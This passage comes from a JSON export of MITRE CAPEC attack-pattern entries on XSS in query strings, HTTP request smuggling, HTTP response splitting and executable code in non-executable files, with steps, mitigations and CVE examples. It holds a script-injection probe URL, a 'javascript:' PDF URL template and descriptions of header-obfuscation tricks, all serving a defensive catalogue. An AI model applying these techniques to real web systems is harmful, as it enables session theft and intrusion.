by the victim\'s browser.","Likelihood_Of_Attack":"High","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"591"},{"Nature":"ChildOf","CAPEC_ID":"588"},{"Nature":"ChildOf","CAPEC_ID":"592"}]},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Spider] Using a browser or an automated tool, an attacker follows all public links on a web site. They record all the links they find.","Technique":["Use a spidering tool to follow and record all links. Make special note of any links that include parameters in the URL.","Use a proxy tool to record all links visited during a manual traversal of the web application. Make special note of any links that include parameters in the URL. Manual traversal of this type is frequently necessary to identify forms that are GET method forms rather than POST forms.","Use a browser to manually explore the website and analyze how it is constructed. Many browser\'s plugins are available to facilitate the analysis or automate the URL discovery."]},{"Step":"2","Phase":"Experiment","Description":"[Attempt variations on input parameters] Possibly using an automated tool, an attacker requests variations on the URLs they spidered before. They send parameters that include variations of payloads. They record all the responses from the server that include unmodified versions of their script.","Technique":["Use a list of XSS probe strings to inject in parameters of known URLs. If possible, the probe strings contain a unique identifier.","Use a proxy tool to record results of manual input of XSS probes in known URLs."]},{"Step":"3","Phase":"Exploit","Description":"[Steal session IDs, credentials, page content, etc.] As the attacker succeeds in exploiting the vulnerability, they can choose to steal user\'s credentials in order to reuse or to analyze them later on.","Technique":["Develop malicious JavaScript that is injected through vectors identified during the Experiment Phase and loaded by the victim\'s browser and sends document information to the attacker.","Develop malicious JavaScript that injected through vectors identified during the Experiment Phase and takes commands from an attacker\'s server and then causes the browser to execute appropriately."]},{"Step":"4","Phase":"Exploit","Description":"[Forceful browsing] When the attacker targets the current application or another one (through CSRF vulnerabilities), the user will then be the one who perform the attacks without being aware of it. These attacks are mostly targeting application logic flaws, but it can also be used to create a widespread attack against a particular website on the user\'s current network (Internet or not).","Technique":["Develop malicious JavaScript that is injected through vectors identified during the Experiment Phase and loaded by the victim\'s browser and performs actions on the same web site","Develop malicious JavaScript that injected through vectors identified during the Experiment Phase and takes commands from an attacker\'s server and then causes the browser to execute request to other web sites (especially the web applications that have CSRF vulnerabilities)."]},{"Step":"5","Phase":"Exploit","Description":"[Content spoofing] By manipulating the content, the attacker targets the information that the user would like to get from the website.","Technique":"Develop malicious JavaScript that is injected through vectors identified during the Experiment Phase and loaded by the victim\'s browser and exposes attacker-modified invalid information to the user on the current web page."}]},"Prerequisites":{"Prerequisite":"Target client software must allow scripting such as JavaScript. Server software must allow display of remote generated HTML without sufficient input or output validation."},"Skills_Required":{"Skill":["To place malicious payload on server via HTTP",{"Level":"Low"},"Exploiting any information gathered by HTTP Query on script host",{"Level":"High"}]},"Resources_Required":{"Resource":"Ability to send HTTP post to scripting host and collect output"},"Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Commands","Note":"Run Arbitrary Code"}]},"Mitigations":{"Mitigation":["Design: Use browser technologies that do not allow client side scripting.","Design: Utilize strict type, character, and encoding enforcement","Design: Server side developers should not proxy content via XHR or other means, if a http proxy for remote content is setup on the server side, the client\'s browser has no way of discerning where the data is originating from.","Implementation: Ensure all content that is delivered to client is sanitized against an acceptable content specification.","Implementation: Perform input validation for all remote content, including remote and user-generated content","Implementation: Perform output validation for all remote content.","Implementation: Disable scripting languages such as JavaScript in browser","Implementation: Session tokens for specific host","Implementation: Patching software. There are many attack vectors for XSS on the client side and the server side. Many vulnerabilities are fixed in service packs for browser, web servers, and plug in technologies, staying current on patch release that deal with XSS countermeasures mitigates this.","Implementation: Privileges are constrained, if a script is loaded, ensure system runs in chroot jail or other limited authority mode"]},"Example_Instances":{"Example":["http://user:host@example.com:8080/oradb<script>alert(\'Hi\')<\/script>",{"p":["Web applications that accept name value pairs in a HTTP Query string are inherently at risk to any value (or name for that matter) that an attacker would like to enter in the query string. This can be done manually via web browser or trivially scripted to post the query string to multiple sites. In the latter case, in the instance of many sites using similar infrastructure with predictable http queries being accepted and operated on (such as blogging software, Google applications, and so on), a single malicious payload can be scripted to target a wide variety of sites.","Web 2.0 type sites like Technorati and del.icio.us rely on user generated content like tags to build http links that are displayed to other users. del.icio.us allows users to identify sites, tag them with metadata and provide URL, descriptions and more data. This data is then echoed back to any other web browser that is interested in the link. If the data is not validated by the del.icio.us site properly then an arbitrary code can be added into the standard http string sent to del.icio.us by the attacker, for example formatted as normal content with a URL and description and tagged as Java, and available to be clicked on (and executed by) any user browsing for Java content that clicks on this trojaned content."]}]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"80"}},"References":{"Reference":{"External_Reference_ID":"REF-1"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-11-09","Modification_Comment":"Updated Attack_Phases"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-12-07","Modification_Comment":"Updated Attack_Phases"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-01-09","Modification_Comment":"Updated Attack_Phases"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Attack_Phases, Description Summary, Related_Attack_Patterns, Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Attack_Phases"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Phases"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Execution_Flow"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Related_Attack_Patterns"}],"Previous_Entry_Name":["Embedding Scripts in HTTP Query Strings",{"Date":"2017-05-01"}]}},"33":{"ID":"33","Name":"HTTP Request Smuggling","Abstraction":"Detailed","Status":"Stable","Description":{"p":["An adversary abuses the flexibility and discrepancies in the parsing and interpretation of HTTP Request messages using various HTTP headers and message sizes (denoted by the end of message signaled by a given HTTP header) by different intermediary HTTP agents (e.g., load balancer, reverse proxy, web caching proxies, application firewalls, etc.) to secretly send unauthorized and malicious HTTP requests to a back-end HTTP agent (e.g., web server).","See CanPrecede relationships for possible consequences."]},"Extended_Description":{"p":["A maliciously crafted HTTP request, which contains a second secretly embedded HTTP request is interpreted by an intermediary web proxy as single benign HTTP request, is forwarded to a back-end server, that interprets and parses the HTTP request as two authorized benign HTTP requests bypassing security controls.","This attack usually involves the misuse of the HTTP headers: Content-Length and Transfer-Encoding. These abuses are discussed in RFC 2616 #4.4.3 and section #4.2 and are related to ordering and precedence of these headers. [REF-38]","This attack is usually the result of the usage of outdated or incompatible HTTP protocol versions in the HTTP agents.","This differs from CAPEC-273 HTTP Response Smuggling, which is usually an attempt to compromise a client agent (e.g., web browser) by sending malicious content in HTTP responses from back-end HTTP infrastructure. HTTP Request Smuggling is an attempt to compromise a",{"em":"back-end HTTP agent"},"HTTP Splitting (CAPEC-105 and CAPEC-34) is different from HTTP Smuggling due to the fact that during implementation of asynchronous requests, HTTP Splitting requires the embedding/injection of arbitrary HTML headers and content through user input into browser cookies or Ajax web/browser object parameters like XMLHttpRequest."]},"Alternate_Terms":{"Alternate_Term":{"Term":"HTTP Desync","Description":"Modification/manipulation of HTTP message headers and body parameters to disrupt and interfere in the interpretation and parsing of HTTP message lengths/boundaries for consecutive HTTP messages by HTTP agents in a HTTP chain or network path."}},"Likelihood_Of_Attack":"Medium","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"220"},{"Nature":"PeerOf","CAPEC_ID":"273"},{"Nature":"CanPrecede","CAPEC_ID":"115"},{"Nature":"CanPrecede","CAPEC_ID":"141"},{"Nature":"CanPrecede","CAPEC_ID":"63"},{"Nature":"CanPrecede","CAPEC_ID":"593"},{"Nature":"CanPrecede","CAPEC_ID":"148"},{"Nature":"CanPrecede","CAPEC_ID":"154"}]},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Survey network to identify target] The adversary performs network reconnaissance by monitoring relevant traffic to identify the network path and parsing of the HTTP messages with the goal of identifying potential targets.","Technique":"Scan networks to fingerprint HTTP infrastructure and monitor HTTP traffic to identify HTTP network path with a tool such as a Network Protocol Analyzer."},{"Step":"1","Phase":"Experiment","Description":"[Identify vulnerabilities in targeted HTTP infrastructure and technologies] The adversary sends a variety of benign/ambiguous HTTP requests to observe responses from HTTP infrastructure in order to identify differences/discrepancies in the interpretation and parsing of HTTP requests by examining supported HTTP protocol versions, message sizes, and HTTP headers."},{"Step":"2","Phase":"Experiment","Description":"[Cause differential HTTP responses by experimenting with identified HTTP Request vulnerabilities] The adversary sends maliciously crafted HTTP requests to interfere with the parsing of intermediary and back-end HTTP infrastructure, followed by normal/benign HTTP request from the adversary or a random user. The intended consequences of the malicious HTTP requests will be observed in the HTTP infrastructure response to the normal/benign HTTP request to confirm applicability of identified vulnerabilities in the adversary\'s plan of attack.","Technique":["Continue the monitoring of HTTP traffic.",{"p":["Utilize various combinations of HTTP Headers within a single HTTP Request such as: Content-Length & Transfer-Encoding (CL;TE), Transfer-Encoding & Content-Length (TE;CL), or double Transfer-Encoding (TE;TE), so that additional embedded requests or data in the body of the original request are unprocessed and treated as part of subsequent requests by the intended target HTTP agent.","From these HTTP Header combinations the adversary observes any timing delays (usually in the form of HTTP 404 Error response) or any other unintended consequences."],"ul":{"li":["For CL;TE and TE;CL HTTP header combinations, the first HTTP agent, in the HTTP message path that receives the HTTP request, takes precedence or only processes one header but not the other, while the second/final HTTP agent processes the opposite header, allowing for embedded HTTP requests to be ignored and smuggled to the intended target HTTP agent.","For TE;TE HTTP headers combination, all HTTP agents in HTTP message path process Transfer-Encoding header, however, adversary obfuscation (see Mitigations for details) of one of the Transfer-Encoding headers, by not adhering strictly to the protocol specification, can cause it to be unprocessed/ignored by a designated HTTP agent, hence allowing embedded HTTP requests to be smuggled. ."]}},{"p":["Construct a very large HTTP request using multiple Content-Length headers of various data lengths that can potentially cause subsequent requests to be ignored by an intermediary HTTP agent (firewall) and/or eventually parsed separately by the target HTTP agent (web server).","Note that most modern HTTP infrastructure reject HTTP requests with multiple Content-Length headers."]},"Follow an unrecognized (sometimes a RFC compliant) HTTP header with a subsequent HTTP request to potentially cause the HTTP request to be ignored and interpreted as part of the preceding HTTP request."]},{"Step":"1","Phase":"Exploit","Description":"[Perform HTTP Request Smuggling attack] Using knowledge discovered in the experiment section above, smuggle a message to cause one of the consequences.","Technique":"Leverage techniques identified in the Experiment Phase."}]},"Prerequisites":{"Prerequisite":["An additional intermediary HTTP agent such as an application firewall or a web caching proxy between the adversary and the second agent such as a web server, that sends multiple HTTP messages over same network connection.","Differences in the way the two HTTP agents parse and interpret HTTP requests and its headers.","HTTP agents running on HTTP/1.1 that allow for Keep Alive mode, Pipelined queries, and Chunked queries and responses."]},"Skills_Required":{"Skill":["Detailed knowledge on HTTP protocol: request and response messages structure and usage of specific headers.",{"Level":"Medium"},"Detailed knowledge on how specific HTTP agents receive, send, process, interpret, and parse a variety of HTTP messages and headers.",{"Level":"Medium"},"Possess knowledge on the exact details in the discrepancies between several targeted HTTP agents in path of an HTTP message in parsing its message structure and individual headers.",{"Level":"Medium"}]},"Resources_Required":{"Resource":"Tools capable of crafting malicious HTTP messages and monitoring HTTP message responses."},"Indicators":{"Indicator":"Differences in requests processed by the two agents. This requires careful monitoring or a capable log analysis tool."},"Consequences":{"Consequence":[{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Commands"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"},{"Scope":"Integrity","Impact":"Modify Data"}]},"Mitigations":{"Mitigation":["Design: evaluate HTTP agents prior to deployment for parsing/interpretation discrepancies.","Configuration: front-end HTTP agents notice ambiguous requests.","Configuration: back-end HTTP agents reject ambiguous requests and close the network connection.","Configuration: Disable reuse of back-end connections.","Configuration: Use HTTP/2 for back-end connections.","Configuration: Use the same web server software for front-end and back-end server.","Implementation: Utilize a Web Application Firewall (WAF) that has built-in mitigation to detect abnormal requests/responses.","Configuration: Prioritize Transfer-Encoding header over Content-Length, whenever an HTTP message contains both.","Configuration: Disallow HTTP messages with both Transfer-Encoding and Content-Length or Double Content-Length Headers.","Configuration: Disallow Malformed/Invalid Transfer-Encoding Headers used in obfuscation, such as:",{"ul":{"li":["Headers with no space before the value \u201cchunked\u201d","Headers with extra spaces","Headers beginning with trailing characters","Headers providing a value \u201cchunk\u201d instead of \u201cchunked\u201d (the server normalizes this as chunked encoding)","Headers with multiple spaces before the value \u201cchunked\u201d","Headers with quoted values (whether single or double quotations)","Headers with CRLF characters before the value \u201cchunked\u201d","Values with invalid characters"]}},"Configuration: Install latest vendor security patches available for both intermediary and back-end HTTP infrastructure (i.e. proxies and web servers)","Configuration: Ensure that HTTP infrastructure in the chain or network path utilize a strict uniform parsing process.","Implementation: Utilize intermediary HTTP infrastructure capable of filtering and/or sanitizing user-input."]},"Example_Instances":{"Example":[{"p":"When using Haproxy 1.5.3 version as front-end proxy server with with Node.js version 14.13.1 or 12.19.0 as the back-end web server it is possible to use two same header fields for example: two Transfer-Encoding, Transfer-Encoding: chunked and Transfer-Encoding: chunked-false, to bypass Haproxy /flag URI restriction and receive the Haproxy flag value, since Node.js identifies the first header but ignores the second header. See also: CVE-2020-8287"},{"p":"When using Sun Java System Web Proxy Server 3.x or 4.x in conjunction with Sun ONE/iPlanet 6.x, Sun Java System Application Server 7.x or 8.x, it is possible to bypass certain application firewall protections, hijack web sessions, perform Cross Site Scripting or poison the web proxy cache using HTTP Request Smuggling. Differences in the way HTTP requests are parsed by the Proxy Server and the Application Server enable malicious requests to be smuggled through to the Application Server, thereby exposing the Application Server to aforementioned attacks. See also: CVE-2006-6276"},{"p":"Apache server 2.0.45 and version before 1.3.34, when used as a proxy, easily lead to web cache poisoning and bypassing of application firewall restrictions because of non-standard HTTP behavior. Although the HTTP/1.1 specification clearly states that a request with both \\"Content-Length\\" and a \\"Transfer-Encoding: chunked\\" headers is invalid, vulnerable versions of Apache accept such requests and reassemble the ones with \\"Transfer-Encoding: chunked\\" header without replacing the existing \\"Content-Length\\" header or adding its own. This leads to HTTP Request Smuggling using a request with a chunked body and a header with \\"Content-Length: 0\\". See also: CVE-2005-2088"}]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"444"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"WASC","Entry_ID":"26","Entry_Name":"HTTP Request Smuggling"}},"References":{"Reference":[{"External_Reference_ID":"REF-38"},{"External_Reference_ID":"REF-117"},{"External_Reference_ID":"REF-617"},{"External_Reference_ID":"REF-672"},{"External_Reference_ID":"REF-673"},{"External_Reference_ID":"REF-674"},{"External_Reference_ID":"REF-678"},{"External_Reference_ID":"REF-681"},{"External_Reference_ID":"REF-682"},{"External_Reference_ID":"REF-683"},{"External_Reference_ID":"REF-684"}]},"Notes":{"Note":["HTTP Splitting \u2013 \\"the act of forcing a sender of (HTTP) messages to emit data stream consisting of more messages than the sender\u2019s intension. The messages sent are 100% valid and RFC compliant\\" [REF-117].",{"Type":"Terminology"},"HTTP Smuggling \u2013 \\"the act of forcing a sender of (HTTP) messages to emit data stream which may be parsed as a different set of messages (i.e. dislocated message boundaries) than the sender\u2019s intention. This is done by virtue of forcing the sender to emit non-standard messages which can be interpreted in more than one way\\" [REF-117].",{"Type":"Terminology"},"HTTP Smuggling is an evolution of previous HTTP Splitting techniques which are commonly remediated against.",{"Type":"Relationship"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Related_Attack_Patterns, Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated References, Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-10-21","Modification_Comment":"Updated @Status, Alternate_Terms, Consequences, Description, Example_Instances, Execution_Flow, Extended_Description, Indicators, Mitigations, Notes, Prerequisites, References, Related_Attack_Patterns, Related_Weaknesses, Resources_Required, Skills_Required"}]}},"34":{"ID":"34","Name":"HTTP Response Splitting","Abstraction":"Detailed","Status":"Stable","Description":{"p":["An adversary manipulates and injects malicious content, in the form of secret unauthorized HTTP responses, into a single HTTP response from a vulnerable or compromised back-end HTTP agent (e.g., web server) or into an already spoofed HTTP response from an adversary controlled domain/site.","See CanPrecede relationships for possible consequences."]},"Extended_Description":{"p":["Malicious user input is injected into various standard and/or user defined HTTP headers within a HTTP Response through use of Carriage Return (CR), Line Feed (LF), Horizontal Tab (HT), Space (SP) characters as well as other valid/RFC compliant special characters, and unique character encoding.","A single HTTP response ends up being split as two or more HTTP responses by the targeted client HTTP agent parsing the original maliciously manipulated HTTP response. This allows malicious HTTP responses to bypass security controls in order to implement malicious actions and provide malicious content that allows access to sensitive data and to compromise applications and users. This is performed by the abuse of interpretation and parsing discrepancies in different intermediary HTTP agents (load balancer, reverse proxy, web caching proxies, application firewalls, etc.) or client HTTP agents (e.g., web browser) in the path of the malicious HTTP responses.","This attack is usually the result of the usage of outdated or incompatible HTTP protocol versions as well as lack of syntax checking and filtering of user input in the HTTP agents receiving HTTP messages in the path.","This differs from CAPEC-105 HTTP Request Splitting, which is usually an attempt to compromise a back-end HTTP agent via HTTP Request messages. HTTP Response Splitting is an attempt to compromise a",{"em":"client agent (e.g., web browser)"},"HTTP Smuggling (CAPEC-33 and CAPEC-273) is different from HTTP Splitting due to the fact it relies upon discrepancies in the interpretation of various HTTP Headers and message sizes and not solely user input of special characters and character encoding. HTTP Smuggling was established to circumvent mitigations against HTTP Request Splitting techniques."]},"Likelihood_Of_Attack":"Medium","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"220"},{"Nature":"PeerOf","CAPEC_ID":"105"},{"Nature":"CanPrecede","CAPEC_ID":"115"},{"Nature":"CanPrecede","CAPEC_ID":"141"},{"Nature":"CanPrecede","CAPEC_ID":"63"},{"Nature":"CanPrecede","CAPEC_ID":"593"},{"Nature":"CanPrecede","CAPEC_ID":"148"},{"Nature":"CanPrecede","CAPEC_ID":"154"}]},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Survey network to identify target] The adversary performs network reconnaissance by monitoring relevant traffic to identify the network path and parsing of the HTTP messages with the goal of identifying potential targets","Technique":"Scan networks to fingerprint HTTP infrastructure and monitor HTTP traffic to identify HTTP network path with a tool such as a Network Protocol Analyzer."},{"Step":"1","Phase":"Experiment","Description":"[Identify vulnerabilities in targeted HTTP infrastructure and technologies] The adversary sends a variety of benign/ambiguous HTTP requests to observe responses from HTTP infrastructure in order to identify differences/discrepancies in the interpretation and parsing of HTTP requests by examining supported HTTP protocol versions, HTTP headers, syntax checking and input filtering."},{"Step":"2","Phase":"Experiment","Description":"[Cause differential HTTP responses by experimenting with identified HTTP Request vulnerabilities] The adversary sends maliciously crafted HTTP request to back-end HTTP infrastructure to inject adversary data (in the form of HTTP headers with custom strings and embedded web scripts and objects) into HTTP responses (intended for intermediary and/or front-end client/victim HTTP agents communicating with back-end HTTP infrastructure) for the purpose of interfering with the parsing of HTTP responses by intermediary and front-end client/victim HTTP agents. The intended consequences of the malicious HTTP request and the subsequent adversary injection and manipulation of HTTP responses to intermediary and front-end client/victim HTTP agents, will be observed to confirm applicability of identified vulnerabilities in the adversary\'s plan of attack.","Technique":["Continue the monitoring of HTTP traffic.",{"p":["Utilize different sequences of special characters (CR - Carriage Return, LF - Line Feed, HT - Horizontal Tab, SP - Space and etc.) to bypass filtering and back-end encoding and to embed:","to utilize additional special characters (e.g., > and <) filtered by the target HTTP agent.","Note that certain special characters and character encoding may be applicable only to intermediary and front-end agents with rare configurations or that are not RFC compliant."],"ul":{"li":["additional HTTP Requests with their own headers","malicious web scripts into parameters of HTTP Request headers (e.g., browser cookies like Set-Cookie or Ajax web/browser object parameters like XMLHttpRequest)","adversary chosen encoding (e.g., UTF-7)"]}},"Follow an unrecognized (sometimes a RFC compliant) HTTP header with a subsequent HTTP request to potentially cause the HTTP request to be ignored and interpreted as part of the preceding HTTP request."]},{"Step":"1","Phase":"Exploit","Description":"[Perform HTTP Response Splitting attack] Using knowledge discovered in the experiment section above, smuggle a message to cause one of the consequences.","Technique":"Leverage techniques identified in the Experiment Phase."}]},"Prerequisites":{"Prerequisite":["A vulnerable or compromised server or domain/site capable of allowing adversary to insert/inject malicious content that will appear in the server\'s response to target HTTP agents (e.g., proxies and users\' web browsers).","Differences in the way the two HTTP agents parse and interpret HTTP requests and its headers.","HTTP headers capable of being user-manipulated.","HTTP agents running on HTTP/1.0 or HTTP/1.1 that allow for Keep Alive mode, Pipelined queries, and Chunked queries and responses."]},"Skills_Required":{"Skill":["Detailed knowledge on HTTP protocol: request and response messages structure and usage of specific headers.",{"Level":"Medium"},"Detailed knowledge on how specific HTTP agents receive, send, process, interpret, and parse a variety of HTTP messages and headers.",{"Level":"Medium"},"Possess knowledge on the exact details in the discrepancies between several targeted HTTP agents in path of an HTTP message in parsing its message structure and individual headers.",{"Level":"Medium"}]},"Resources_Required":{"Resource":"Tools capable of monitoring HTTP messages, and crafting malicious HTTP messages and/or injecting malicious content into HTTP messages."},"Indicators":{"Indicator":"Differences in responses processed by the two agents with multiple responses to a single request in the web logs. This requires careful monitoring or a capable log analysis tool."},"Consequences":{"Consequence":[{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Commands"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"},{"Scope":"Integrity","Impact":"Modify Data"}]},"Mitigations":{"Mitigation":["Design: evaluate HTTP agents prior to deployment for parsing/interpretation discrepancies.","Configuration: front-end HTTP agents notice ambiguous requests.","Configuration: back-end HTTP agents reject ambiguous requests and close the network connection.","Configuration: Disable reuse of back-end connections.","Configuration: Use HTTP/2 for back-end connections.","Configuration: Use the same web server software for front-end and back-end server.","Implementation: Utilize a Web Application Firewall (WAF) that has built-in mitigation to detect abnormal requests/responses.","Configuration: Install latest vendor security patches available for both intermediary and back-end HTTP infrastructure (i.e. proxies and web servers)","Configuration: Ensure that HTTP infrastructure in the chain or network path utilize a strict uniform parsing process.","Implementation: Utilize intermediary HTTP infrastructure capable of filtering and/or sanitizing user-input."]},"Example_Instances":{"Example":{"p":"In the PHP 5 session extension mechanism, a user-supplied session ID is sent back to the user within the Set-Cookie HTTP header. Since the contents of the user-supplied session ID are not validated, it is possible to inject arbitrary HTTP headers into the response body. This immediately enables HTTP Response Splitting by simply terminating the HTTP response header from within the session ID used in the Set-Cookie directive. See also: CVE-2006-0207"}},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"74"},{"CWE_ID":"113"},{"CWE_ID":"138"},{"CWE_ID":"436"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"WASC","Entry_ID":"25","Entry_Name":"HTTP Response Splitting"}},"References":{"Reference":[{"External_Reference_ID":"REF-1"},{"External_Reference_ID":"REF-117"},{"External_Reference_ID":"REF-617"},{"External_Reference_ID":"REF-680"}]},"Notes":{"Note":["HTTP Splitting \u2013 \\"the act of forcing a sender of (HTTP) messages to emit data stream consisting of more messages than the sender\u2019s intension. The messages sent are 100% valid and RFC compliant\\" [REF-117].",{"Type":"Terminology"},"HTTP Smuggling \u2013 \\"the act of forcing a sender of (HTTP) messages to emit data stream which may be parsed as a different set of messages (i.e. dislocated message boundaries) than the sender\u2019s intention. This is done by virtue of forcing the sender to emit non-standard messages which can be interpreted in more than one way\\" [REF-117].",{"Type":"Terminology"},"HTTP Smuggling is an evolution of previous HTTP Splitting techniques which are commonly remediated against.",{"Type":"Relationship"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Attack_Phases, Attack_Prerequisites, Attacker_Skills_or_Knowledge_Required, Description Summary, Payload_Activation_Impact, Probing_Techniques, Related_Attack_Patterns, Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Phases, References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Execution_Flow"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-10-21","Modification_Comment":"Updated @Status, Consequences, Description, Example_Instances, Execution_Flow, Extended_Description, Indicators, Mitigations, Notes, Prerequisites, References, Related_Attack_Patterns, Related_Weaknesses, Resources_Required, Skills_Required, Taxonomy_Mappings"}]}},"35":{"ID":"35","Name":"Leverage Executable Code in Non-Executable Files","Abstraction":"Detailed","Status":"Draft","Description":"An attack of this type exploits a system\'s trust in configuration and resource files. When the executable loads the resource (such as an image file or configuration file) the attacker has modified the file to either execute malicious code directly or manipulate the target process (e.g. application server) to execute based on the malicious configuration parameters. Since systems are increasingly interrelated mashing up resources from local and remote sources the possibility of this attack occurring is high.","Likelihood_Of_Attack":"High","Typical_Severity":"Very High","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"636"},{"Nature":"PeerOf","CAPEC_ID":"23"},{"Nature":"PeerOf","CAPEC_ID":"75"}]},"Prerequisites":{"Prerequisite":"The attacker must have the ability to modify non-executable files consumed by the target software."},"Skills_Required":{"Skill":["To identify and execute against an over-privileged system interface",{"Level":"Low"}]},"Resources_Required":{"Resource":"Ability to communicate synchronously or asynchronously with server that publishes an over-privileged directory, program, or interface. Optionally, ability to capture output directly through synchronous communication or other method such as FTP."},"Consequences":{"Consequence":[{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Commands","Note":"Run Arbitrary Code"},{"Scope":"Integrity","Impact":"Modify Data"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"}]},"Mitigations":{"Mitigation":["Design: Enforce principle of least privilege","Design: Run server interfaces with a non-root account and/or utilize chroot jails or other configuration techniques to constrain privileges even if attacker gains some limited access to commands.","Implementation: Perform testing such as pen-testing and vulnerability scanning to identify directories, programs, and interfaces that grant direct access to executables.","Implementation: Implement host integrity monitoring to detect any unwanted altering of configuration files.","Implementation: Ensure that files that are not required to execute, such as configuration files, are not over-privileged, i.e. not allowed to execute."]},"Example_Instances":{"Example":["Virtually any system that relies on configuration files for runtime behavior is open to this attack vector. The configuration files are frequently stored in predictable locations, so an attacker that can fingerprint a server process such as a web server or database server can quickly identify the likely locale where the configuration is stored. And this is of course not limited to server processes. Unix shells rely on profile files to store environment variables, search paths for programs and so on. If the aliases are changed, then a standard Unix \\"cp\\" command can be rerouted to \\"rm\\" or other standard command so the user\'s intention is subverted.","The attack can be directed at a client system, such as causing buffer overrun through loading seemingly benign image files, as in Microsoft Security Bulletin MS04-028 where specially crafted JPEG files could cause a buffer overrun once loaded into the browser.",{"p":["Another example targets clients reading pdf files. In this case the attacker simply appends javascript to the end of a legitimate url for a pdf (http://www.gnucitizen.org/blog/danger-danger-danger/)","http://path/to/pdf/file.pdf#whatever_name_you_want=javascript:your_code_here","The client assumes that they are reading a pdf, but the attacker has modified the resource and loaded executable javascript into the client\'s browser process."]},{"p":["The attack can also target server processes. The attacker edits the resource or configuration file, for example a web.xml file used to configure security permissions for a J2EE app server, adding role name \\"public\\" grants all users with the public role the ability to use the administration functionality.","The server trusts its configuration file to be correct, but when they are manipulated, the attacker gains full control."],"div":["< security-constraint>",{"style":"margin-left:10px;","class":"informative","div":["<description>Security processing rules for admin screens</description>",{"style":"margin-left:10px;","div":["<auth-constraint>",{"style":"margin-left:10px;","div":["<role-name>administrator</role-name>",{"style":"margin-left:10px;"}]}]}]}]}]},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"94"},{"CWE_ID":"96"},{"CWE_ID":"95"},{"CWE_ID":"97"},{"CWE_ID":"272"},{"CWE_ID":"59"},{"CWE_ID":"282"},{"CWE_ID":"270"}]},"References":{"Reference":{"External_Reference_ID":"REF-1"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content 